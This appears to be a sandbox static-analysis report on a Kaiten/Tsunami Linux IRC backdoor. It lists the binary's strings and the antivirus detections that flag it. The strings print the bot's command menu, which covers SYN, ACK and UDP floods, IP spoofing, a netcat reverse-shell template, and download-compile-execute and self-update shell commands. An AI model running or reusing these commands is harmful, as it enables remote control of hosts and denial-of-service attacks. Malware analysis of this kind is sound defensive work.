Static | ZeroBOX
/lib64/ld-linux-x86-64.so.2
libc.so.6
socket
strcpy
strncmp
connect
strncpy
listen
select
vsprintf
getpid
strdup
strtok
getppid
strlen
memset
strstr
__errno_location
toupper
inet_network
inet_addr
memcpy
fclose
setsockopt
malloc
strcasecmp
system
gethostbyname
pclose
waitpid
sendto
accept
__libc_start_main
__gmon_start__
GLIBC_2.14
GLIBC_2.2.5
AUATSH
[A\A]]
[]A\A]A^A_
3qC?nys7ooqv"y3ryqn
3qC?nyAq*7y3ryqn
NOTICE %s :Unable to comply.
/usr/share/dict/words
%s : USERID : UNIX : %s
NOTICE %s :GET <host> <save as>
NOTICE %s :Unable to create socket.
http://
NOTICE %s :Unable to resolve address.
NOTICE %s :Unable to connect to http.
GET /%s HTTP/1.0
Connection: Keep-Alive
User-Agent: HackZilla/4.75 [en] (X11; U; Linux 2.2.16-3 %s)
Host: %s:80
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
NOTICE %s :Receiving file.
NOTICE %s :Saved as %s
NOTICE %s :Spoofs: %d.%d.%d.%d
NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d
NOTICE %s :%s
NOTICE %s :NICK <nick>
NOTICE %s :Nick cannot be larger than 9 characters.
NICK %s
NOTICE %s :DISABLE <pass>
Disabled
Enabled and awaiting orders
NOTICE %s :Current status is: %s.
NOTICE %s :Already disabled.
NOTICE %s :Disable sucessful.
NOTICE %s :Wrong password
NOTICE %s :ENABLE <pass>
NOTICE %s :Already enabled.
NOTICE %s :Password correct.
NOTICE %s :Removed all spoofs
NOTICE %s :What kind of subnet address is that? Do something like: 169.40
NOTICE %s :Unable to resolve %s
NOTICE %s :UDP <target> <port> <secs>
NOTICE %s :Packeting %s.
NOTICE %s :PAN <target> <port> <secs>
NOTICE %s :Panning %s.
NOTICE %s :UNKNOWN <target> <secs>
NOTICE %s :Unknowning %s.
NOTICE %s :SYNFLOOD <target> <port> <secs>
NOTICE %s :Flooding with TCP SYN %s.
NOTICE %s :NSSYNFLOOD <target> <port> <secs>
NOTICE %s :RANDOMFLOOD <target> <port> <secs>
NOTICE %s :Flooding with TCP SYN/ACK %s.
NOTICE %s :ACKFLOOD <target> <port> <secs>
NOTICE %s :Flooding with TCP ACK %s.
NOTICE %s :NSACKFLOOD <target> <port> <secs>
NOTICE %s :UPDATEHTTP <host> <src:bin>
NOTICE %s :Unable to create socket (Wierd, you shouldnt get this error and ITS NOT MY FAULT!).
gcc --help
GET /%s HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
Host: %s:80
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
NOTICE %s :Receiving update.
mkdir /tmp
/tmp/.c
(gcc -o %s /tmp/.c; rm -rf /tmp/.c; kill -9 %d;trap '' 1; %s &) > /dev/null 2>&1
/tmp/.o
trap 1;(cat /tmp/.o > %s; chmod 755 %s; trap '' 1;((killall -9 %s || kill -9 %d);kill -9 %d ;trap 1; ./%s &)) > /dev/null
NOTICE %s :MOVE <server>
NOTICE %s :HACKPGK <url> <binary name>
/var/bin
GET /%s HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/1.67 [en] (X11; U; Linux 2.2.16-3 x86)
Host: %s:80
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
NOTICE %s :Installed %s to /var/bin/%s.
cat %s > /var/bin/%s
chmod 775 /var/bin/%s
NOTICE %s :Kaiten %s = Shell 2022 - Commands must take a parameter.
NOTICE %s :=============== DDOS ATTACKS & Functions ======= =
NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers
NOTICE %s :UDP <target> <port> <secs> = A udp flooder
NOTICE %s :UNKNOWN <target> <secs> = The best non-spoof udp flooder
NOTICE %s :RANDOMFLOOD <target> <port> <secs> = Syn/Ack Flooder.
NOTICE %s :NSACKFLOOD <target> <port> <secs> = New Generation Ack Flooder!
NOTICE %s :NSSYNFLOOD <target> <port> <secs> = New Generation Syn Fooder!
NOTICE %s :SYNFLOOD <target> <port> <secs> = A classic synflooder.
NOTICE %s :ACKFLOOD <target> <port> <secs> = A classic ackflooder.
NOTICE %s :GETSPOOFS = Gets the current spoofing
NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet
NOTICE %s :KILLALL = Kills all current packeting
NOTICE %s :=============== Bot/IRC Functions ============== =
NOTICE %s :NICK <nick> = Changes the nick of the client
NOTICE %s :SERVER <server> = Changes servers
NOTICE %s :IRC <command> = Sends this command to the server
NOTICE %s :DISABLE = Disables all packeting from this client
NOTICE %s :ENABLE = Enables all packeting from this client
NOTICE %s :KILL = Kills the client
NOTICE %s :VERSION = Requests version of client
NOTICE %s :HELP = Displays this
NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd
NOTICE %s :UPDATE <http address> <src:bin> = Update this bot
NOTICE %s :HACKPKG <http address> <bin name> = HackPkg is here! Install a bin, using http, no depends!
NOTICE %s :======== Unix Shell & Command Functions ======== =
NOTICE %s :SH <command> = Executes a command
NOTICE %s :ISH <command> = SH, interactive, sends to channel
NOTICE %s :SHD <command> = Executes a daemonized command
NOTICE %s :BASH <cmd> = Execute commands using bash (if present).
NOTICE %s :SYSINFO 0 = Print env,users, useful programs, uptime, etc.
NOTICE %s :RSHELL <server> <port> = Equates to nohup nc ip port -e /bin/sh
NOTICE %s :Killing pid %d.
iptables -P INPUT ACCEPT;iptables-save;kill -9 %d;kill -9 0
UNKNOWN
RANDOMFLOOD
NSACKFLOOD
NSSYNFLOOD
ACKFLOOD
SYNFLOOD
SERVER
GETSPOOFS
SPOOFS
HACKPKG
DISABLE
ENABLE
UPDATE
FUCKIT
VERSION
KILLALL
$7?*$s7<F
http://%s/repo
export PATH=/var/bin:/bin:/sbin:/usr/sbin:/usr/bin;%s
NOTICE %s :%s
export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/sbin:/usr/bin;trap '' 1;(%s 1>&- 2>&- > /dev/null 2>&1) &
export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/sbin:/usr/bin;%s
#asing
PRIVMSG %s :%s
RSHELL
export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/sbin:/usr/bin;trap '' 1 2; sh -c 'nc %s -e /bin/sh '&
export HOME=/tmp;export SHELL=/bin/bash;export PATH=/var/bin:/bin:/sbin:/usr/sbin:/usr/bin;%s
PONG %s
NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
MODE %s -xi
$7$73|tFE
JOIN %s :%s
WHO %s
PRIVMSG
imap
NICK %s
USER %s localhost localhost :%s
Under World
GCC: (GNU) 4.8.5 20150623 (Red Hat 4.8.5-39)
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6355
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
kaiten.c
textBuffer.4840
i.5041
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
identd
__libc_csu_fini
decodedsrv
execfile
update
free@@GLIBC_2.2.5
recv@@GLIBC_2.2.5
strcasecmp@@GLIBC_2.2.5
randomflood
__errno_location@@GLIBC_2.2.5
actualparent
strncpy@@GLIBC_2.2.5
strncmp@@GLIBC_2.2.5
strcpy@@GLIBC_2.2.5
mkdir@@GLIBC_2.2.5
toupper@@GLIBC_2.2.5
setsockopt@@GLIBC_2.2.5
in_cksum
inet_network@@GLIBC_2.2.5
hackpkg
write@@GLIBC_2.2.5
getpid@@GLIBC_2.2.5
_edata
fclose@@GLIBC_2.2.5
strlen@@GLIBC_2.2.5
system@@GLIBC_2.2.5
htons@@GLIBC_2.2.5
pclose@@GLIBC_2.2.5
filter
memset@@GLIBC_2.2.5
ioctl@@GLIBC_2.2.5
sendto@@GLIBC_2.2.5
changeservers
disable
fputc@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
srand@@GLIBC_2.2.5
fgets@@GLIBC_2.2.5
decodedpsw
__data_start
inet_addr@@GLIBC_2.2.5
spoofsm
unknown
gethostbyname@@GLIBC_2.2.5
feof@@GLIBC_2.2.5
__gmon_start__
__dso_handle
memcpy@@GLIBC_2.14
_IO_stdin_used
kill@@GLIBC_2.2.5
time@@GLIBC_2.2.5
select@@GLIBC_2.2.5
flooders
__libc_csu_init
server
malloc@@GLIBC_2.2.5
listen@@GLIBC_2.2.5
_PRIVMSG
numservers
numpids
host2ip
makestring
__bss_start
getspoof
bcopy@@GLIBC_2.2.5
decode
bind@@GLIBC_2.2.5
vsprintf@@GLIBC_2.2.5
waitpid@@GLIBC_2.2.5
atol@@GLIBC_2.2.5
popen@@GLIBC_2.2.5
fopen@@GLIBC_2.2.5
botversion
strtok@@GLIBC_2.2.5
enable
nssynflood
strwildmatch
accept@@GLIBC_2.2.5
atoi@@GLIBC_2.2.5
nsackflood
getppid@@GLIBC_2.2.5
exit@@GLIBC_2.2.5
connect@@GLIBC_2.2.5
__TMC_END__
disabled
ntohl@@GLIBC_2.2.5
strdup@@GLIBC_2.2.5
sleep@@GLIBC_2.2.5
getspoofs
fork@@GLIBC_2.2.5
strstr@@GLIBC_2.2.5
socket@@GLIBC_2.2.5
killall
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.plt.got
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.comment
Antivirus Signature
Bkav Clean
Lionic Trojan.Linux.Tsunami.4!c
Elastic Linux.Trojan.Tsunami
MicroWorld-eScan Generic.Malware.GJIRTFg.06A56C72
FireEye Generic.Malware.GJIRTFg.06A56C72
CAT-QuickHeal Clean
McAfee RDN/Generic BackDoor
Malwarebytes Clean
Zillya Clean
Sangfor Suspicious.Linux.Save.a
K7AntiVirus Clean
K7GW Trojan ( 0040f0e01 )
BitDefenderTheta Clean
VirIT Clean
Symantec Linux.Backdoor.Kaiten
ESET-NOD32 a variant of Linux/Tsunami.NAL
Cynet Malicious (score: 99)
Kaspersky HEUR:Backdoor.Linux.Tsunami.bh
BitDefender Generic.Malware.GJIRTFg.06A56C72
NANO-Antivirus Trojan.Elf64.Tsunami.jybodq
ViRobot Clean
Rising Backdoor.Tsunami/Linux!1.A1B2 (CLASSIC)
F-Secure Malware.LINUX/Flooder.ciszq
DrWeb Linux.Siggen.9999
VIPRE Generic.Malware.GJIRTFg.06A56C72
CMC Clean
Sophos Linux/Tsunami-A
SentinelOne Static AI - Malicious ELF
Jiangmin Clean
Google Detected
Avira LINUX/Flooder.ciszq
MAX malware (ai score=82)
Antiy-AVL Trojan/Linux.Tsunami.a
Kingsoft Script.Ks.Malware.3227
Gridinsoft Clean
Xcitium Clean
Arcabit Generic.Malware.GJIRTFg.06A56C72
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Backdoor.Linux.Tsunami.bh
Avast-Mobile ELF:Tsunami-FN [Trj]
Varist E64/ABRisk.GGAT-5
AhnLab-V3 Linux/Tsunami.Gen
Acronis Clean
VBA32 Clean
ALYac Generic.Malware.GJIRTFg.06A56C72
TACHYON Clean
Zoner Clean
Tencent Backdoor.Linux.Tsunami.x
Yandex Clean
Ikarus Trojan.Linux.Tsunami
MaxSecure Clean
Fortinet ELF/Katien.R!tr
Panda Clean
No IRMA results available.